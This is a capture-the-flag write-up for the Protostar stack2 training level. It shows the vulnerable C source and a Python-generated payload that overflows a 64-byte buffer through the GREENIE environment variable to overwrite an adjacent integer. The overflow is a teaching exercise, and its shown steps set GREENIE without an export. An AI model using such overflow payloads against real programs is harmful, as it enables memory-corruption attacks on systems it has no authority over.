We start off with understanding what is being asked of us:
About
Stack2 looks at environment variables, and how they can be set.This level is at /opt/protostar/bin/stack2
Source code
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable; variable = getenv("GREENIE"); if(variable == NULL) { errx(1, "please set the GREENIE environment variable\n"); } modified = 0; strcpy(buffer, variable); if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variable\n"); } else { printf("Try again, you got 0x%08x\n", modified); } }
I start off by first running the program:
$ ./stack2 stack2: please set the GREENIE environment variable $
As expected, the GREENIE variable is empty.
Looking at the source code, the buffer is being filled with the environment variable GREENIE. Our goal is to update the environment variable GREENIE with our 64 byte overflow and then insert 0x0d0a0d0a.
To do this, we first start by echo'ing our payload into file:
$ python -c 'print "A" * 64 + "\x0a\x0d\x0a\x0d"' > /tmp/payload $ cat /tmp/payload AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA $
Next, we set our GREENIE variable as the contents of /tmp/payload.
$ GREENIE=$(cat /tmp/payload) $ echo $GREENIE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA $
With everything in place, we run the program
$ ./stack2 you have correctly modified the variable $
Success!
Thanks for reading.
-geoda